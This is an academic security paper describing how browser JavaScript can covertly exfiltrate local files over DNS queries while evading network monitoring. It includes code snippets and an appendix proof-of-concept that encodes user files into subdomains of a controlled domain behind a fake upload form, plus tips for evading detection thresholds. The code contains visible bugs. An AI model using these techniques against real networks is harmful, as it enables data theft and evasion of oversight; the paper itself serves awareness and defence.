# Browser-Based Covert Data Exfiltration

**Kenton Born**
**Kansas State University**
**kborn@ksu.edu**

## Abstract

Current best practices heavily control user permissions on network systems. This effectively mitigates many insider threats regarding the collection and exfiltration of data. Many methods of covert communication involve crafting custom packets, typically requiring both the necessary software and elevated privileges on the system. By exploiting the functionality of a browser, covert channels for data exfiltration may be created without additional software or user privileges. This paper explores novel methods of using a browser’s JavaScript engine to exfiltrate documents over the Domain Name System (DNS) protocol without sending less covert Hypertext Transfer Protocol (HTTP) requests.

## Introduction

Covert channels are often mitigated by monitoring network traffic and enforcing a policy of least privileges on company systems. Firewalls and network intrusion detection systems (NIDS) greatly reduce covert channel possibilities by detecting and preventing protocols that are against the network policy. However, most networks must allow HTTP, SMTP, and DNS communication between internal hosts and external servers. While HTTP and SMTP are heavily monitored, DNS is often only investigated when NIDS detect anomalous behavior.

DNS and HTTP are transactional protocols that work hand-in-hand to provide the functionality necessary for internet browsing. Before resources can be requested through HTTP, the web server's domain must be resolved to an IP address by first sending a DNS query to the authoritative name server for that domain. A fully qualified domain name (FQDN) is formed through a series of labels that separate it into subdomains, each one controlled by the subdomain to its right. RFC 1035 specifies the allowable characters as a-Z, 0-9, and dashes (Mockapetris 1987). Additionally, the RFC limits the labels to 63 octets or less, with the full domain being 255 octets or less.

DNS tunnels are often built by embedding data in the lower level domains (LLDs) of queries to a name server. The name server can then decode the data in the LLD and reply to the host by embedding data or commands in the DNS response. Similarly, HTTP offers bi-directional tunneling possibilities through methods such as request parameters, custom headers, and cookies. Channels of this type are known as *covert storage channels* because there is a storage location written to and read from. *Covert timing channels*, on the other hand, involve transmitting information through time values corresponding to the same response (Cabuk et al. 2009). DNS and HTTP may be used for covert timing channels by altering the timing between requests, or at even lower layers in the protocol stack by altering the timing or ordering of individual packets (El-Atawy and Al-Shaer 2009). However, most of these methods presented require additional software and elevated privileges.

## Related Work

HTTP is the most commonly used method of bypassing restrictive network policies. GNU httptunnel is an example of a tunnel that allows protocols to be embedded inside HTTP requests and responses (httptunnel 2008). Hauser (Hauser 1998) explored covert shell exploitation by using HTTP request parameters to build a Reverse WWW Shell, providing command and control channels to the internal system. A privacy-based approach was analyzed in by Bauer (Bauer 2003) where an anonymous overlay network was developed using embedded cookies, redirects, and active content. An innovative method of bypassing website restrictions was explored using a tool known as Infranet (Feamster et al. 2002). Censored web pages were steganographically tunneled inside images and extracted at the client.

Lack of monitoring has lead to DNS tunnels such as Iodine, Dns2tcp, and TCP-over-DNS growing in popularity (TCP-Over-DNS 2008; Dembour 2008; Iodine 2009). Covert storage channels from the client to the server are created by encoding data into the lower level domains of DNS, while responses are typically sent by storing data in TXT or NULL record types. Although many detection strategies have been developed, few tools are available for DNS tunnel detection.

Multiple methods of creating and detecting storage timing channels was explored by Cabuk (Cabuk et al. 2004; Cabuk et al. 2009). One popular method involves encoding data in the interarrival time between packets, while another strategy uses an interval-based arrival time approach. While covert timing channels are the most difficult to detect, they offer little bandwidth when compared to covert storage channels.

## Data Exfiltration Over DNS

DNS-based data exfiltration may be accomplished without additional software or user privileges by quickly implementing Javascript in a text editor that can be launched in the system’s browser. This will leave only a small, overwriteable fingerprint on the file system. However, fine-grained control of DNS is not provided by the JavaScript API. An approach must be used that effectively separates DNS requests from HTTP requests, preventing the latter from ever being sent. Additionally, some form of bi-directional communication would be desired to provide robustness and reliability to the covert channel. Both of these objectives can be accomplished using many different features of modern browsers.

To exfiltrate documents over DNS using JavaScript, the file must first be read from the local system and turned into a binary string, optionally compressing or encrypting it in the process. The data must then be encoded using the allowable DNS characters specified in RFC 1035 (Mockapetris 1987). This can be accomplished using a modified version of base32 or base64 encoding. The final data representation may then be broken into segments that can be exfiltrated in separate DNS queries. An example framework for accomplishing these steps using Firefox is provided in Appendix A.

### DNS Prefetching

In order to build a covert DNS channel without sending HTTP requests, the two protocols must be separated using client-side JavaScript. While the language does not offer this type of fine-grained access to the protocols, several tricks may be used to generate the desired functionality.

The simplest method of creating custom DNS queries is through the DNS prefetching functionality that is now implemented in most browsers by default. Prefetching allows websites to pre-resolve IP addresses for domains that the user will likely visit while browsing the website. This increases the responsiveness of future resources, allowing HTTP requests to immediately be sent to the prefetched domains. Below, an example is provided that can be added to the "head" section of an HTML document to prefetch an IP address for a domain:

```
<link rel="dns-prefetch" href="http://www.ThisDomainIsPrefetched.com">
```

While this method is simple and effective, there are flaws in using this approach for data exfiltration. Dynamically generating and adding prefetch links to the head section of a document real-time does not work in some browsers. A new HTML document must be created and opened after generating the necessary link elements. This adds unnecessary steps to data exfiltration.

A more effective method may be implemented by taking advantage of the DNS prefetching of anchor elements. When an anchor element is added to the body of an HTML document, a DNS query will be sent to resolve the IP address of the domain in the "href" attribute. This may be exploited by dynamically creating anchor elements with JavaScript, replacing the LLD a controlled (or monitored) domain with the data that should be exfiltrated to the DNS server.

To prevent NIDS from triggering on a threshold limit (for instance, warning about a denial-of-service attack), the JavaScript should add a delay between requests. While JavaScript does not have a "sleep" functionality to appropriately space out the DNS requests, it can created in two ways. Firstly, one can create a "sleep" function using the "Date" object and a while loop. However, this requires unecessary resources in a spin lock. Alternatively, the "setTimeout" function can be used, recursively calling itself as if in a loop. Below, example code is provided that demonstrates this approach:

```
var body = document.getElementsByTagName('body')[0];

function generateQueries() {
   if(!isLastQuery())
      setTimeout(generateQueries, 1000);

   var anchor = document.createElement('a');
   anchor.href = generateNextLLD() + '.' + domain + '/' + resource;
   body.appendChild(anchor);
}

generateQueries();
```

## Separating DNS from HTTP

Because DNS prefetching can be disabled, alternative methods may be necessary to exfiltrate data. Using custom JavaScript, it is possible to separate DNS queries from HTTP requests without exploiting prefetching. When the 'src' attribute of a dynamically created object is set (for instance, on a new "img" object), it will first create a DNS query to obtain the IP address for the provided domain. This is followed by an HTTP request for the resource at that domain. The script will not continue to execute until a response to the DNS query is received. There are two strategies that can be used to separate the HTTP request from the DNS query.

Firstly, the name server can be instructed to return an "NXDomain" response for each request (decoding the LLD in the process). When this response is returned to the script, the code will continue to execute without sending an HTTP request. However, this method will generate a heavy amount of "NXDomain" replies, which may alert cybersecurity if packets are sent too frequently. Also, some combinations of browsers and settings will attempt to resolve these domains several times by retrying with IPv6 and prepending "www" to the domain name. However, some of these settings may be altered through the browser without additional privileges (for example, by typing "about:config" in the Firefox URL bar). Note that the "NXDomain" behavior mimics the behavior of a legimate name server, making it unnecessary to own the domain if the traffic to legimate sites is observable.

Alternatively, a more covert method involves sending requests to a controlled domain that does not reply to the DNS requests (a black hole). This may force the NIDS to drop the connection after a timeout, failing to report it as an "NXDomain" response. However, this strategy has the problem of halting the JavaScript code while waiting for the DNS response. This can be mitigated by using JavaScript's "setTimeout(function,millis)" method once again to recursively call a query generation method as follows:

```
function generateQueries() {
   if(!isLastQuery())
      setTimeout(generateNextQuery,1000);

   var img = document.createElement('img');
   img.src = generateNextLLD() + '.' + domain + '/' + resource;
}
```

When the “src” attribute is set, the JavaScript will halt while waiting for a reply. However, the timeout will re-invoke the function without the previous instance ever completing. This will, in turn, generate the next packet and allow progress continue as if it was in a packet generation loop. However, it must be noted that some setups will prevent too many outstanding DNS requests (most commonly set at eight), which will mitigate the bandwidth of the tunnel. Many browsers will also repeat these queries before progress continues.

## Bi-directional Storage and Timing Channels

Instead of using a constant delay between DNS queries (as seen in the examples above), data may also be encoded in the inter-arrival time between queries. This can be done by replacing the timeout time with a function that computes the desired time between sent packets. Alternatively, the constant timeout time can be used and followed with a conditional test that determines whether or not a packet should be sent for that interval. While Cabuk (Cabuk et al. 2004; Cabuk et al. 2009) shows that these two basic methods can be detected using statistical methods, much more complex timing channels can be built off these building blocks that simulate typical traffic patterns and delays.

Similar to clients, the name servers may use covert timing channels to communicate with the client by altering the time between responses. This can analyzed client-side by checing the 'Date' object before the query is sent and again after the DNS response is returned. The “Date” object provides clock accuracy to the nearest millisecond. This bi-directional channel may be used for sending commands back to the client or for adding reliability feedback from the server.

However, tools such as Traffic Controller (Wang 2009) can be used to mitigate covert timing channels by altering the timing of delivered packets at a position between the client and server. Unless delay was added that exceeds the threshold of the tool, a covert timing channel would be defeated. However, tools such as Traffic Controller are restricted from adding significant delays to traffic due to decreased browsing speeds for legitimate users.

The server can alternatively create a storage covert channel through clever use of DNS responses. When the “generateQueries” function is called, it can check whether or not the previous response was received or not by altering an array of booleans after the “src” attribute is set. This provides the server a 1-bit per response channel to communicate with the client by alternating between “NXDomain” responses and not sending a response. A simplified version of accomplishing this is presented below:

```
function generateQueries(seq) {
   if(!isLastQuery())
      setTimeout(generateQueries, generateNextTimeout(), (seq+1));

   var img = document.createElement('img');
   img.src =  generateNextLLD() + '.' + domain + '/' + resource;
   receivedQueries[seq] = true;   //only called when NXDomain is returned!
}
```

It should be noted that maintaining an array after the 'src' attribute is set may also be used for adding reliability to “NXDomain” channels. Before the next packet is generated, a simple check can be performed whether or not a response was received for previous requests. If a response was not received and the previous iteration timed out, the query can be resent. Note that when the browser is restricted to a certain number of outstanding requests (commonly eight), this will restrict the bandwidth of a “black-hole” tunnel.

# Conclusions and Future Work

This work presents several novel methods of covertly exfiltrating data without elevated privileges on a system. It is important to note that this research is done in the attitude of raising awareness as opposed to benefiting individuals with malicious intent. This work is presented in hopes that the methods proposed may be mitigated through increased monitoring and awareness.

It has been shown above that covert DNS channels created through client-side JavaScript are a threat to network security. This problem is not easily addressed through privilege management. Instead, it must be mitigated through increased monitoring and awareness of the threat.

Firstly, multiple methods were shown that separate DNS queries from HTTP requests. These varied in implementation and level of covertness. It was also shown how they could be combined to provide a bi-directional covert channel between the client and server. Secondly, it was shown how these methods could be altered to build covert timing channels through DNS queries and responses, also allowing bi-directional communication between the client and server. Appendex A shows a proof-of-concept client framework for implementing many of these ideas.

Future work will explore how these techniques can be combined with popular website traffic to provide an extra layer of covertness and additional bandwidth. A strategy for mitigating and monitoring this threat will also be developed by analyzing best practices for DNS tunnel detection against common data exfiltration scenarios.

# *Appendix A – Client Framework*

```
<html>
<head>
<script>
  var domain = "mydomain.com";
  var LLD_size = 50;
  var body = document.getElementsByTagName('body')[0];

  function sendQueries(argsArray) {
    var queries = argsArray[0];
    var query_num = argsArray[1];

    if( (query_num+1) < queries.length)
      setTimeout(sendQueries, getNextDelay(), [queries, query_num+1]);

    if(query_num < queries.length) {
      var anchor = document.createElement('a');
      var before_date = new Date();
      anchor.href = queries[query_num];
      var after_date = new Date();
      interpretDelay(after_date – before_date);
      body.appendChild(anchor);
    }
  }

  function exfiltrateFiles(files) {
    for(var i=0; i < files.length; i++) {
      var binString = files[i].getAsBinary();
      var dnsString = base64(encrypt(compress(binString)));
      var numPackets = Math.ceil(dnsString.length/LLD_size);

      var queries = new Array();
      var beginIndex;
      var endIndex;

      for(var i=0; i < numPackets; i++) {
        beginIndex = i * LLD_size;
        endIndex = beginIndex + LLD_size;
        if(endIndex < dnsString.length)
          endIndex = data.length;

        var nextLLD = addSequencing(data.substring(beginIndex, endIndex));
        queries[i] = nextLLD + '.' + domain + '/' + generateFakeResource();
    }
    var argsArray = [queries, 1];
    sendQueries(argsArray);
  }

</script>
</head>
<body>
  <center>
  <p>Please choose a document to upload </p>
  <form id="file_form" method=post enctyp="multiparty/form-data">
    <input type=file id="input" multiple="true />
    <input type=button name="Submit" value="Submit"
        onclick="exfiltrateFiles(document.getElementById('input').files)" />
  </form>
</body>
</html>
```